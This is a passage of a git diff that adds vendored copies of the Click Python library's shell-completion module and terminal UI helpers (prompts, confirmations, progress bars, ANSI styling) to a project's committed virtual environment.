b/env/Lib/site-packages/click/shell_completion.py @@ -0,0 +1,596 @@ +import os +import re +import typing as t +from gettext import gettext as _ + +from .core import Argument +from .core import BaseCommand +from .core import Context +from .core import MultiCommand +from .core import Option +from .core import Parameter +from .core import ParameterSource +from .parser import split_arg_string +from .utils import echo + + +def shell_complete( + cli: BaseCommand, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + complete_var: str, + instruction: str, +) -> int: + """Perform shell completion for the given CLI program. + + :param cli: Command being called. + :param ctx_args: Extra arguments to pass to + ``cli.make_context``. + :param prog_name: Name of the executable in the shell. + :param complete_var: Name of the environment variable that holds + the completion instruction. + :param instruction: Value of ``complete_var`` with the completion + instruction and shell, in the form ``instruction_shell``. + :return: Status code to exit with. + """ + shell, _, instruction = instruction.partition("_") + comp_cls = get_completion_class(shell) + + if comp_cls is None: + return 1 + + comp = comp_cls(cli, ctx_args, prog_name, complete_var) + + if instruction == "source": + echo(comp.source()) + return 0 + + if instruction == "complete": + echo(comp.complete()) + return 0 + + return 1 + + +class CompletionItem: + """Represents a completion value and metadata about the value. The + default metadata is ``type`` to indicate special shell handling, + and ``help`` if a shell supports showing a help string next to the + value. + + Arbitrary parameters can be passed when creating the object, and + accessed using ``item.attr``. If an attribute wasn't passed, + accessing it returns ``None``. + + :param value: The completion suggestion. + :param type: Tells the shell script to provide special completion + support for the type. Click uses ``"dir"`` and ``"file"``. + :param help: String shown next to the value if supported. + :param kwargs: Arbitrary metadata. The built-in implementations + don't use this, but custom type completions paired with custom + shell support could use it. + """ + + __slots__ = ("value", "type", "help", "_info") + + def __init__( + self, + value: t.Any, + type: str = "plain", + help: t.Optional[str] = None, + **kwargs: t.Any, + ) -> None: + self.value: t.Any = value + self.type: str = type + self.help: t.Optional[str] = help + self._info = kwargs + + def __getattr__(self, name: str) -> t.Any: + return self._info.get(name) + + +# Only Bash >= 4.4 has the nosort option. +_SOURCE_BASH = """\ +%(complete_func)s() { + local IFS=$'\\n' + local response + + response=$(env COMP_WORDS="${COMP_WORDS[*]}" COMP_CWORD=$COMP_CWORD \ +%(complete_var)s=bash_complete $1) + + for completion in $response; do + IFS=',' read type value <<< "$completion" + + if [[ $type == 'dir' ]]; then + COMPREPLY=() + compopt -o dirnames + elif [[ $type == 'file' ]]; then + COMPREPLY=() + compopt -o default + elif [[ $type == 'plain' ]]; then + COMPREPLY+=($value) + fi + done + + return 0 +} + +%(complete_func)s_setup() { + complete -o nosort -F %(complete_func)s %(prog_name)s +} + +%(complete_func)s_setup; +""" + +_SOURCE_ZSH = """\ +#compdef %(prog_name)s + +%(complete_func)s() { + local -a completions + local -a completions_with_descriptions + local -a response + (( ! $+commands[%(prog_name)s] )) && return 1 + + response=("${(@f)$(env COMP_WORDS="${words[*]}" COMP_CWORD=$((CURRENT-1)) \ +%(complete_var)s=zsh_complete %(prog_name)s)}") + + for type key descr in ${response}; do + if [[ "$type" == "plain" ]]; then + if [[ "$descr" == "_" ]]; then + completions+=("$key") + else + completions_with_descriptions+=("$key":"$descr") + fi + elif [[ "$type" == "dir" ]]; then + _path_files -/ + elif [[ "$type" == "file" ]]; then + _path_files -f + fi + done + + if [ -n "$completions_with_descriptions" ]; then + _describe -V unsorted completions_with_descriptions -U + fi + + if [ -n "$completions" ]; then + compadd -U -V unsorted -a completions + fi +} + +if [[ $zsh_eval_context[-1] == loadautofunc ]]; then + # autoload from fpath, call function directly + %(complete_func)s "$@" +else + # eval/source/. command, register function for later + compdef %(complete_func)s %(prog_name)s +fi +""" + +_SOURCE_FISH = """\ +function %(complete_func)s; + set -l response (env %(complete_var)s=fish_complete COMP_WORDS=(commandline -cp) \ +COMP_CWORD=(commandline -t) %(prog_name)s); + + for completion in $response; + set -l metadata (string split "," $completion); + + if test $metadata[1] = "dir"; + __fish_complete_directories $metadata[2]; + else if test $metadata[1] = "file"; + __fish_complete_path $metadata[2]; + else if test $metadata[1] = "plain"; + echo $metadata[2]; + end; + end; +end; + +complete --no-files --command %(prog_name)s --arguments \ +"(%(complete_func)s)"; +""" + + +class ShellComplete: + """Base class for providing shell completion support. A subclass for + a given shell will override attributes and methods to implement the + completion instructions (``source`` and ``complete``). + + :param cli: Command being called. + :param prog_name: Name of the executable in the shell. + :param complete_var: Name of the environment variable that holds + the completion instruction. + + .. versionadded:: 8.0 + """ + + name: t.ClassVar[str] + """Name to register the shell as with :func:`add_completion_class`. + This is used in completion instructions (``{name}_source`` and + ``{name}_complete``). + """ + + source_template: t.ClassVar[str] + """Completion script template formatted by :meth:`source`. This must + be provided by subclasses. + """ + + def __init__( + self, + cli: BaseCommand, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + complete_var: str, + ) -> None: + self.cli = cli + self.ctx_args = ctx_args + self.prog_name = prog_name + self.complete_var = complete_var + + @property + def func_name(self) -> str: + """The name of the shell function defined by the completion + script. + """ + safe_name = re.sub(r"\W*", "", self.prog_name.replace("-", "_"), flags=re.ASCII) + return f"_{safe_name}_completion" + + def source_vars(self) -> t.Dict[str, t.Any]: + """Vars for formatting :attr:`source_template`. + + By default this provides ``complete_func``, ``complete_var``, + and ``prog_name``. + """ + return { + "complete_func": self.func_name, + "complete_var": self.complete_var, + "prog_name": self.prog_name, + } + + def source(self) -> str: + """Produce the shell script that defines the completion + function. By default this ``%``-style formats + :attr:`source_template` with the dict returned by + :meth:`source_vars`. + """ + return self.source_template % self.source_vars() + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + """Use the env vars defined by the shell script to return a + tuple of ``args, incomplete``. This must be implemented by + subclasses. + """ + raise NotImplementedError + + def get_completions( + self, args: t.List[str], incomplete: str + ) -> t.List[CompletionItem]: + """Determine the context and last complete command or parameter + from the complete args. Call that object's ``shell_complete`` + method to get the completions for the incomplete value. + + :param args: List of complete args before the incomplete value. + :param incomplete: Value being completed. May be empty. + """ + ctx = _resolve_context(self.cli, self.ctx_args, self.prog_name, args) + obj, incomplete = _resolve_incomplete(ctx, args, incomplete) + return obj.shell_complete(ctx, incomplete) + + def format_completion(self, item: CompletionItem) -> str: + """Format a completion item into the form recognized by the + shell script. This must be implemented by subclasses. + + :param item: Completion item to format. + """ + raise NotImplementedError + + def complete(self) -> str: + """Produce the completion data to send back to the shell. + + By default this calls :meth:`get_completion_args`, gets the + completions, then calls :meth:`format_completion` for each + completion. + """ + args, incomplete = self.get_completion_args() + completions = self.get_completions(args, incomplete) + out = [self.format_completion(item) for item in completions] + return "\n".join(out) + + +class BashComplete(ShellComplete): + """Shell completion for Bash.""" + + name = "bash" + source_template = _SOURCE_BASH + + @staticmethod + def _check_version() -> None: + import subprocess + + output = subprocess.run( + ["bash", "-c", 'echo "${BASH_VERSION}"'], stdout=subprocess.PIPE + ) + match = re.search(r"^(\d+)\.(\d+)\.\d+", output.stdout.decode()) + + if match is not None: + major, minor = match.groups() + + if major < "4" or major == "4" and minor < "4": + echo( + _( + "Shell completion is not supported for Bash" + " versions older than 4.4." + ), + err=True, + ) + else: + echo( + _("Couldn't detect Bash version, shell completion is not supported."), + err=True, + ) + + def source(self) -> str: + self._check_version() + return super().source() + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + cwords = split_arg_string(os.environ["COMP_WORDS"]) + cword = int(os.environ["COMP_CWORD"]) + args = cwords[1:cword] + + try: + incomplete = cwords[cword] + except IndexError: + incomplete = "" + + return args, incomplete + + def format_completion(self, item: CompletionItem) -> str: + return f"{item.type},{item.value}" + + +class ZshComplete(ShellComplete): + """Shell completion for Zsh.""" + + name = "zsh" + source_template = _SOURCE_ZSH + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + cwords = split_arg_string(os.environ["COMP_WORDS"]) + cword = int(os.environ["COMP_CWORD"]) + args = cwords[1:cword] + + try: + incomplete = cwords[cword] + except IndexError: + incomplete = "" + + return args, incomplete + + def format_completion(self, item: CompletionItem) -> str: + return f"{item.type}\n{item.value}\n{item.help if item.help else '_'}" + + +class FishComplete(ShellComplete): + """Shell completion for Fish.""" + + name = "fish" + source_template = _SOURCE_FISH + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + cwords = split_arg_string(os.environ["COMP_WORDS"]) + incomplete = os.environ["COMP_CWORD"] + args = cwords[1:] + + # Fish stores the partial word in both COMP_WORDS and + # COMP_CWORD, remove it from complete args. + if incomplete and args and args[-1] == incomplete: + args.pop() + + return args, incomplete + + def format_completion(self, item: CompletionItem) -> str: + if item.help: + return f"{item.type},{item.value}\t{item.help}" + + return f"{item.type},{item.value}" + + +ShellCompleteType = t.TypeVar("ShellCompleteType", bound=t.Type[ShellComplete]) + + +_available_shells: t.Dict[str, t.Type[ShellComplete]] = { + "bash": BashComplete, + "fish": FishComplete, + "zsh": ZshComplete, +} + + +def add_completion_class( + cls: ShellCompleteType, name: t.Optional[str] = None +) -> ShellCompleteType: + """Register a :class:`ShellComplete` subclass under the given name. + The name will be provided by the completion instruction environment + variable during completion. + + :param cls: The completion class that will handle completion for the + shell. + :param name: Name to register the class under. Defaults to the + class's ``name`` attribute. + """ + if name is None: + name = cls.name + + _available_shells[name] = cls + + return cls + + +def get_completion_class(shell: str) -> t.Optional[t.Type[ShellComplete]]: + """Look up a registered :class:`ShellComplete` subclass by the name + provided by the completion instruction environment variable. If the + name isn't registered, returns ``None``. + + :param shell: Name the class is registered under. + """ + return _available_shells.get(shell) + + +def _is_incomplete_argument(ctx: Context, param: Parameter) -> bool: + """Determine if the given parameter is an argument that can still + accept values. + + :param ctx: Invocation context for the command represented by the + parsed complete args. + :param param: Argument object being checked. + """ + if not isinstance(param, Argument): + return False + + assert param.name is not None + # Will be None if expose_value is False. + value = ctx.params.get(param.name) + return ( + param.nargs == -1 + or ctx.get_parameter_source(param.name) is not ParameterSource.COMMANDLINE + or ( + param.nargs > 1 + and isinstance(value, (tuple, list)) + and len(value) < param.nargs + ) + ) + + +def _start_of_option(ctx: Context, value: str) -> bool: + """Check if the value looks like the start of an option.""" + if not value: + return False + + c = value[0] + return c in ctx._opt_prefixes + + +def _is_incomplete_option(ctx: Context, args: t.List[str], param: Parameter) -> bool: + """Determine if the given parameter is an option that needs a value. + + :param args: List of complete args before the incomplete value. + :param param: Option object being checked. + """ + if not isinstance(param, Option): + return False + + if param.is_flag or param.count: + return False + + last_option = None + + for index, arg in enumerate(reversed(args)): + if index + 1 > param.nargs: + break + + if _start_of_option(ctx, arg): + last_option = arg + + return last_option is not None and last_option in param.opts + + +def _resolve_context( + cli: BaseCommand, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + args: t.List[str], +) -> Context: + """Produce the context hierarchy starting with the command and + traversing the complete arguments. This only follows the commands, + it doesn't trigger input prompts or callbacks. + + :param cli: Command being called. + :param prog_name: Name of the executable in the shell. + :param args: List of complete args before the incomplete value. + """ + ctx_args["resilient_parsing"] = True + ctx = cli.make_context(prog_name, args.copy(), **ctx_args) + args = ctx.protected_args + ctx.args + + while args: + command = ctx.command + + if isinstance(command, MultiCommand): + if not command.chain: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + ctx = cmd.make_context(name, args, parent=ctx, resilient_parsing=True) + args = ctx.protected_args + ctx.args + else: + sub_ctx = ctx + + while args: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + sub_ctx = cmd.make_context( + name, + args, + parent=ctx, + allow_extra_args=True, + allow_interspersed_args=False, + resilient_parsing=True, + ) + args = sub_ctx.args + + ctx = sub_ctx + args = [*sub_ctx.protected_args, *sub_ctx.args] + else: + break + + return ctx + + +def _resolve_incomplete( + ctx: Context, args: t.List[str], incomplete: str +) -> t.Tuple[t.Union[BaseCommand, Parameter], str]: + """Find the Click object that will handle the completion of the + incomplete value. Return the object and the incomplete value. + + :param ctx: Invocation context for the command represented by + the parsed complete args. + :param args: List of complete args before the incomplete value. + :param incomplete: Value being completed. May be empty. + """ + # Different shells treat an "=" between a long option name and + # value differently. Might keep the value joined, return the "=" + # as a separate item, or return the split name and value. Always + # split and discard the "=" to make completion easier. + if incomplete == "=": + incomplete = "" + elif "=" in incomplete and _start_of_option(ctx, incomplete): + name, _, incomplete = incomplete.partition("=") + args.append(name) + + # The "--" marker tells Click to stop treating values as options + # even if they start with the option character. If it hasn't been + # given and the incomplete arg looks like an option, the current + # command will provide option name completions. + if "--" not in args and _start_of_option(ctx, incomplete): + return ctx.command, incomplete + + params = ctx.command.get_params(ctx) + + # If the last complete arg is an option name with an incomplete + # value, the option will provide value completions. + for param in params: + if _is_incomplete_option(ctx, args, param): + return param, incomplete + + # It's not an option name or value. The first argument without a + # parsed value will provide value completions. + for param in params: + if _is_incomplete_argument(ctx, param): + return param, incomplete + + # There were no unparsed arguments, the command may be a group that + # will provide command name completions. + return ctx.command, incomplete diff --git a/env/Lib/site-packages/click/termui.py b/env/Lib/site-packages/click/termui.py new file mode 100644 index 00000000..db7a4b28 --- /dev/null +++ b/env/Lib/site-packages/click/termui.py @@ -0,0 +1,784 @@ +import inspect +import io +import itertools +import sys +import typing as t +from gettext import gettext as _ + +from ._compat import isatty +from ._compat import strip_ansi +from .exceptions import Abort +from .exceptions import UsageError +from .globals import resolve_color_default +from .types import Choice +from .types import convert_type +from .types import ParamType +from .utils import echo +from .utils import LazyFile + +if t.TYPE_CHECKING: + from ._termui_impl import ProgressBar + +V = t.TypeVar("V") + +# The prompt functions to use. The doc tools currently override these +# functions to customize how they work. +visible_prompt_func: t.Callable[[str], str] = input + +_ansi_colors = { + "black": 30, + "red": 31, + "green": 32, + "yellow": 33, + "blue": 34, + "magenta": 35, + "cyan": 36, + "white": 37, + "reset": 39, + "bright_black": 90, + "bright_red": 91, + "bright_green": 92, + "bright_yellow": 93, + "bright_blue": 94, + "bright_magenta": 95, + "bright_cyan": 96, + "bright_white": 97, +} +_ansi_reset_all = "\033[0m" + + +def hidden_prompt_func(prompt: str) -> str: + import getpass + + return getpass.getpass(prompt) + + +def _build_prompt( + text: str, + suffix: str, + show_default: bool = False, + default: t.Optional[t.Any] = None, + show_choices: bool = True, + type: t.Optional[ParamType] = None, +) -> str: + prompt = text + if type is not None and show_choices and isinstance(type, Choice): + prompt += f" ({', '.join(map(str, type.choices))})" + if default is not None and show_default: + prompt = f"{prompt} [{_format_default(default)}]" + return f"{prompt}{suffix}" + + +def _format_default(default: t.Any) -> t.Any: + if isinstance(default, (io.IOBase, LazyFile)) and hasattr(default, "name"): + return default.name + + return default + + +def prompt( + text: str, + default: t.Optional[t.Any] = None, + hide_input: bool = False, + confirmation_prompt: t.Union[bool, str] = False, + type: t.Optional[t.Union[ParamType, t.Any]] = None, + value_proc: t.Optional[t.Callable[[str], t.Any]] = None, + prompt_suffix: str = ": ", + show_default: bool = True, + err: bool = False, + show_choices: bool = True, +) -> t.Any: + """Prompts a user for input. This is a convenience function that can + be used to prompt a user for input later. + + If the user aborts the input by sending an interrupt signal, this + function will catch it and raise a :exc:`Abort` exception. + + :param text: the text to show for the prompt. + :param default: the default value to use if no input happens. If this + is not given it will prompt until it's aborted. + :param hide_input: if this is set to true then the input value will + be hidden. + :param confirmation_prompt: Prompt a second time to confirm the + value. Can be set to a string instead of ``True`` to customize + the message. + :param type: the type to use to check the value against. + :param value_proc: if this parameter is provided it's a function that + is invoked instead of the type conversion to + convert a value. + :param prompt_suffix: a suffix that should be added to the prompt. + :param show_default: shows or hides the default value in the prompt. + :param err: if set to true the file defaults to ``stderr`` instead of + ``stdout``, the same as with echo. + :param show_choices: Show or hide choices if the passed type is a Choice. + For example if type is a Choice of either day or week, + show_choices is true and text is "Group by" then the + prompt will be "Group by (day, week): ". + + .. versionadded:: 8.0 + ``confirmation_prompt`` can be a custom string. + + .. versionadded:: 7.0 + Added the ``show_choices`` parameter. + + .. versionadded:: 6.0 + Added unicode support for cmd.exe on Windows. + + .. versionadded:: 4.0 + Added the `err` parameter. + + """ + + def prompt_func(text: str) -> str: + f = hidden_prompt_func if hide_input else visible_prompt_func + try: + # Write the prompt separately so that we get nice + # coloring through colorama on Windows + echo(text.rstrip(" "), nl=False, err=err) + # Echo a space to stdout to work around an issue where + # readline causes backspace to clear the whole line. + return f(" ") + except (KeyboardInterrupt, EOFError): + # getpass doesn't print a newline if the user aborts input with ^C. + # Allegedly this behavior is inherited from getpass(3). + # A doc bug has been filed at https://bugs.python.org/issue24711 + if hide_input: + echo(None, err=err) + raise Abort() from None + + if value_proc is None: + value_proc = convert_type(type, default) + + prompt = _build_prompt( + text, prompt_suffix, show_default, default, show_choices, type + ) + + if confirmation_prompt: + if confirmation_prompt is True: + confirmation_prompt = _("Repeat for confirmation") + + confirmation_prompt = _build_prompt(confirmation_prompt, prompt_suffix) + + while True: + while True: + value = prompt_func(prompt) + if value: + break + elif default is not None: + value = default + break + try: + result = value_proc(value) + except UsageError as e: + if hide_input: + echo(_("Error: The value you entered was invalid."), err=err) + else: + echo(_("Error: {e.message}").format(e=e), err=err) # noqa: B306 + continue + if not confirmation_prompt: + return result + while True: + value2 = prompt_func(confirmation_prompt) + is_empty = not value and not value2 + if value2 or is_empty: + break + if value == value2: + return result + echo(_("Error: The two entered values do not match."), err=err) + + +def confirm( + text: str, + default: t.Optional[bool] = False, + abort: bool = False, + prompt_suffix: str = ": ", + show_default: bool = True, + err: bool = False, +) -> bool: + """Prompts for confirmation (yes/no question). + + If the user aborts the input by sending a interrupt signal this + function will catch it and raise a :exc:`Abort` exception. + + :param text: the question to ask. + :param default: The default value to use when no input is given. If + ``None``, repeat until input is given. + :param abort: if this is set to `True` a negative answer aborts the + exception by raising :exc:`Abort`. + :param prompt_suffix: a suffix that should be added to the prompt. + :param show_default: shows or hides the default value in the prompt. + :param err: if set to true the file defaults to ``stderr`` instead of + ``stdout``, the same as with echo. + + .. versionchanged:: 8.0 + Repeat until input is given if ``default`` is ``None``. + + .. versionadded:: 4.0 + Added the ``err`` parameter. + """ + prompt = _build_prompt( + text, + prompt_suffix, + show_default, + "y/n" if default is None else ("Y/n" if default else "y/N"), + ) + + while True: + try: + # Write the prompt separately so that we get nice + # coloring through colorama on Windows + echo(prompt.rstrip(" "), nl=False, err=err) + # Echo a space to stdout to work around an issue where + # readline causes backspace to clear the whole line. + value = visible_prompt_func(" ").lower().strip() + except (KeyboardInterrupt, EOFError): + raise Abort() from None + if value in ("y", "yes"): + rv = True + elif value in ("n", "no"): + rv = False + elif default is not None and value == "": + rv = default + else: + echo(_("Error: invalid input"), err=err) + continue + break + if abort and not rv: + raise Abort() + return rv + + +def echo_via_pager( + text_or_generator: t.Union[t.Iterable[str], t.Callable[[], t.Iterable[str]], str], + color: t.Optional[bool] = None, +) -> None: + """This function takes a text and shows it via an environment specific + pager on stdout. + + .. versionchanged:: 3.0 + Added the `color` flag. + + :param text_or_generator: the text to page, or alternatively, a + generator emitting the text to page. + :param color: controls if the pager supports ANSI colors or not. The + default is autodetection. + """ + color = resolve_color_default(color) + + if inspect.isgeneratorfunction(text_or_generator): + i = t.cast(t.Callable[[], t.Iterable[str]], text_or_generator)() + elif isinstance(text_or_generator, str): + i = [text_or_generator] + else: + i = iter(t.cast(t.Iterable[str], text_or_generator)) + + # convert every element of i to a text type if necessary + text_generator = (el if isinstance(el, str) else str(el) for el in i) + + from ._termui_impl import pager + + return pager(itertools.chain(text_generator, "\n"), color) + + +def progressbar( + iterable: t.Optional[t.Iterable[V]] = None, + length: t.Optional[int] = None, + label: t.Optional[str] = None, + show_eta: bool = True, + show_percent: t.Optional[bool] = None, + show_pos: bool = False, + item_show_func: t.Optional[t.Callable[[t.Optional[V]], t.Optional[str]]] = None, + fill_char: str = "#", + empty_char: str = "-", + bar_template: str = "%(label)s [%(bar)s] %(info)s", + info_sep: str = " ", + width: int = 36, + file: t.Optional[t.TextIO] = None, + color: t.Optional[bool] = None, + update_min_steps: int = 1, +) -> "ProgressBar[V]": + """This function creates an iterable context manager that can be used + to iterate over something while showing a progress bar. It will + either iterate over the `iterable` or `length` items (that are counted + up). While iteration happens, this function will print a rendered + progress bar to the given `file` (defaults to stdout) and will attempt + to calculate remaining time and more. By default, this progress bar + will not be rendered if the file is not a terminal. + + The context manager creates the progress bar. When the context + manager is entered the progress bar is already created. With every + iteration over the progress bar, the iterable passed to the bar is + advanced and the bar is updated. When the context manager exits, + a newline is printed and the progress bar is finalized on screen. + + Note: The progress bar is currently designed for use cases where the + total progress can be expected to take at least several seconds. + Because of this, the ProgressBar class object won't display + progress that is considered too fast, and progress where the time + between steps is less than a second. + + No printing must happen or the progress bar will be unintentionally + destroyed. + + Example usage:: + + with progressbar(items) as bar: + for item in bar: + do_something_with(item) + + Alternatively, if no iterable is specified, one can manually update the + progress bar through the `update()` method instead of directly + iterating over the progress bar. The update method accepts the number + of steps to increment the bar with:: + + with progressbar(length=chunks.total_bytes) as bar: + for chunk in chunks: + process_chunk(chunk) + bar.update(chunks.bytes) + + The ``update()`` method also takes an optional value specifying the + ``current_item`` at the new position. This is useful when used + together with ``item_show_func`` to customize the output for each + manual step:: + + with click.progressbar( + length=total_size, + label='Unzipping archive', + item_show_func=lambda a: a.filename + ) as bar: + for archive in zip_file: + archive.extract() + bar.update(archive.size, archive) + + :param iterable: an iterable to iterate over. If not provided the length + is required. + :param length: the number of items to iterate over. By default the + progressbar will attempt to ask the iterator about its + length, which might or might not work. If an iterable is + also provided this parameter can be used to override the + length. If an iterable is not provided the progress bar + will iterate over a range of that length. + :param label: the label to show next to the progress bar. + :param show_eta: enables or disables the estimated time display. This is + automatically disabled if the length cannot be + determined. + :param show_percent: enables or disables the percentage display. The + default is `True` if the iterable has a length or + `False` if not. + :param show_pos: enables or disables the absolute position display. The + default is `False`. + :param item_show_func: A function called with the current item which + can return a string to show next to the progress bar. If the + function returns ``None`` nothing is shown. The current item can + be ``None``, such as when entering and exiting the bar. + :param fill_char: the character to use to show the filled part of the + progress bar. + :param empty_char: the character to use to show the non-filled part of + the progress bar. + :param bar_template: the format string to use as template for the bar. + The parameters in it are ``label`` for the label, + ``bar`` for the progress bar and ``info`` for the + info section. + :param info_sep: the separator between multiple info items (eta etc.) + :param width: the width of the progress bar in characters, 0 means full + terminal width + :param file: The file to write to. If this is not a terminal then + only the label is printed. + :param color: controls if the terminal supports ANSI colors or not. The + default is autodetection. This is only needed if ANSI + codes are included anywhere in the progress bar output + which is not the case by default. + :param update_min_steps: Render only when this many updates have + completed. This allows tuning for very fast iterators. + + .. versionchanged:: 8.0 + Output is shown even if execution time is less than 0.5 seconds. + + .. versionchanged:: 8.0 + ``item_show_func`` shows the current item, not the previous one. + + .. versionchanged:: 8.0 + Labels are echoed if the output is not a TTY. Reverts a change + in 7.0 that removed all output. + + .. versionadded:: 8.0 + Added the ``update_min_steps`` parameter. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. Added the ``update`` method to + the object. + + .. versionadded:: 2.0 + """ + from ._termui_impl import ProgressBar + + color = resolve_color_default(color) + return ProgressBar( + iterable=iterable, + length=length, + show_eta=show_eta, + show_percent=show_percent, + show_pos=show_pos, + item_show_func=item_show_func, + fill_char=fill_char, + empty_char=empty_char, + bar_template=bar_template, + info_sep=info_sep, + file=file, + label=label, + width=width, + color=color, + update_min_steps=update_min_steps, + ) + + +def clear() -> None: + """Clears the terminal screen. This will have the effect of clearing + the whole visible space of the terminal and moving the cursor to the + top left. This does not do anything if not connected to a terminal. + + .. versionadded:: 2.0 + """ + if not isatty(sys.stdout): + return + + # ANSI escape \033[2J clears the screen, \033[1;1H moves the cursor + echo("\033[2J\033[1;1H", nl=False) + + +def _interpret_color( + color: t.Union[int, t.Tuple[int, int, int], str], offset: int = 0 +) -> str: + if isinstance(color, int): + return f"{38 + offset};5;{color:d}" + + if isinstance(color, (tuple, list)): + r, g, b = color + return f"{38 + offset};2;{r:d};{g:d};{b:d}" + + return str(_ansi_colors[color] + offset) + + +def style( + text: t.Any, + fg: t.Optional[t.Union[int, t.Tuple[int, int, int], str]] = None, + bg: t.Optional[t.Union[int, t.Tuple[int, int, int], str]] = None, + bold: t.Optional[bool] = None, + dim: t.Optional[bool] = None, + underline: t.Optional[bool] = None, + overline: t.Optional[bool] = None, + italic: t.Optional[bool] = None, + blink: t.Optional[bool] = None, + reverse: t.Optional[bool] = None, + strikethrough: t.Optional[bool] = None, + reset: bool = True, +) -> str: + """Styles a text with ANSI styles and returns the new string. By + default the styling is self contained which means that at the end + of the string a reset code is issued. This can be prevented by + passing ``reset=False``. + + Examples:: + + click.echo(click.style('Hello World!', fg='green')) + click.echo(click.style('ATTENTION!', blink=True)) + click.echo(click.style('Some things', reverse=True, fg='cyan')) + click.echo(click.style('More colors', fg=(255, 12, 128), bg=117)) + + Supported color names: + + * ``black`` (might be a gray) + * ``red`` + * ``green`` + * ``yellow`` (might be an orange) + * ``blue`` + * ``magenta`` + * ``cyan`` + * ``white`` (might be light gray) + * ``bright_black`` + * ``bright_red`` + * ``bright_green`` + * ``bright_yellow`` + * ``bright_blue`` + * ``bright_magenta`` + * ``bright_cyan`` + * ``bright_white`` + * ``reset`` (reset the color code only) + + If the terminal supports it, color may also be specified as: + + - An integer in the interval [0, 255]. The terminal must support + 8-bit/256-color mode. + - An RGB tuple of three integers in [0, 255]. The terminal must + support 24-bit/true-color mode. + + See https://en.wikipedia.org/wiki/ANSI_color and + https://gist.github.com/XVilka/8346728 for more information. + + :param text: the string to style with ansi codes. + :param fg: if provided this will become the foreground color. + :param bg: if provided this will become the background color. + :param bold: if provided this will enable or disable bold mode. + :param dim: if provided this will enable or disable dim mode. This is + badly supported. + :param underline: if provided this will enable or disable underline. + :param overline: if provided this will enable or disable overline. + :param italic: if provided this will enable or disable italic. + :param blink: if provided this will enable or disable blinking. + :param reverse: if provided this will enable or disable inverse + rendering (foreground becomes background and the + other way round). + :param strikethrough: if provided this will enable or disable + striking through text. + :param reset: by default a reset-all code is added at the end of the + string which means that styles do not carry over. This + can be disabled to compose styles. + + .. versionchanged:: 8.0 + A non-string ``message`` is converted to a string. + + .. versionchanged:: 8.0 + Added support for 256 and RGB color codes. + + .. versionchanged:: 8.0 + Added the ``strikethrough``, ``italic``, and ``overline`` + parameters. + + .. versionchanged:: 7.0 + Added support for bright colors. + + .. versionadded:: 2.0 + """ + if not isinstance(text, str): + text = str(text) + + bits = [] + + if fg: + try: + bits.append(f"\033[{_interpret_color(fg)}m") + except KeyError: + raise TypeError(f"Unknown color {fg!r}") from None + + if bg: + try: + bits.append(f"\033[{_interpret_color(bg, 10)}m") + except KeyError: + raise TypeError(f"Unknown color {bg!r}") from None + + if bold is not None: + bits.append(f"\033[{1 if bold else 22}m") + if dim is not None: + bits.append(f"\033[{2 if dim else 22}m") + if underline is not None: + bits.append(f"\033[{4 if underline else 24}m") + if overline is not None: + bits.append(f"\033[{53 if overline else 55}m") + if italic is not None: + bits.append(f"\033[{3 if italic else 23}m") + if blink is not None: + bits.append(f"\033[{5 if blink else 25}m") + if reverse is not None: + bits.append(f"\033[{7 if reverse else 27}m") + if strikethrough is not None: + bits.append(f"\033[{9 if strikethrough else 29}m") + bits.append(text) + if reset: + bits.append(_ansi_reset_all) + return "".join(bits) + + +def unstyle(text: str) -> str: + """Removes ANSI styling information from a string. Usually it's not + necessary to use this function as Click's echo function will + automatically remove styling if necessary. + + .. versionadded:: 2.0 + + :param text: the text to remove style information from. + """ + return strip_ansi(text) + + +def secho( + message: t.Optional[t.Any] = None, + file: t.Optional[t.IO[t.AnyStr]] = None, + nl: bool = True, + err: bool = False, + color: t.Optional[bool] = None, + **styles: t.Any, +) -> None: + """This function combines :func:`echo` and :func:`style` into one + call. As such the following two calls are the same:: + + click.secho('Hello World!', fg='green') + click.echo(click.style('Hello World!', fg='green')) + + All keyword arguments are forwarded to the underlying functions + depending on which one they go with. + + Non-string types will be converted to :class:`str`. However, + :class:`bytes` are passed directly to :meth:`echo` without applying + style. If you want to style bytes that represent text, call + :meth:`bytes.decode` first. + + .. versionchanged:: 8.0 + A non-string ``message`` is converted to a string. Bytes are + passed through without style applied. + + .. versionadded:: 2.0 + """ + if message is not None and not isinstance(message, (bytes, bytearray)): + message = style(message, **styles) + + return echo(message, file=file, nl=nl, err=err, color=color) + + +def edit( + text: t.Optional[t.AnyStr] = None, + editor: t.Optional[str] = None, + env: t.Optional[t.Mapping[str, str]] = None, + require_save: bool = True, + extension: str = ".txt", + filename: t.Optional[str] = None, +) -> t.Optional[t.AnyStr]: + r"""Edits the given text in the defined editor. If an editor is given + (should be the full path to the executable but the regular operating + system search path is used for finding the executable) it overrides + the detected editor. Optionally, some environment variables can be + used. If the editor is closed without changes, `None` is returned. In + case a file is edited directly the return value is always `None` and + `require_save` and `extension` are ignored. + + If the editor cannot be opened a :exc:`UsageError` is raised. + + Note for Windows: to simplify cross-platform usage, the newlines are + automatically converted from POSIX to Windows and vice versa. As such, + the message here will have ``\n`` as newline markers. + + :param text: the text to edit. + :param editor: optionally the editor to use. Defaults to automatic + detection. + :param env: environment variables to forward to the editor. + :param require_save: if this is true, then not saving in the editor + will make the return value become `None`. + :param extension: the extension to tell the editor about. This defaults + to `.txt` but changing this might change syntax + highlighting. + :param filename: if provided it will edit this file instead of the + provided text contents. It will not use a temporary + file as an indirection in that case. + """ + from ._termui_impl import Editor + + ed = Editor(editor=editor, env=env, require_save=require_save, extension=extension) + + if filename is None: + return ed.edit(text) + + ed.edit_file(filename) + return None + + +def launch(url: str, wait: bool = False, locate: bool = False) -> int: + """This function launches the given URL (or filename) in the default + viewer application for this file type. If this is an executable, it + might launch the executable in a new session. The return value is + the exit code of the launched application. Usually, ``0`` indicates + success. + + Examples:: + + click.launch('https://click.palletsprojects.com/') + click.launch('/my/downloaded/file', locate=True) + + .. versionadded:: 2.0 + + :param url: URL or filename of the thing to launch. + :param wait: Wait for the program to exit before returning. This + only works if the launched program blocks. In 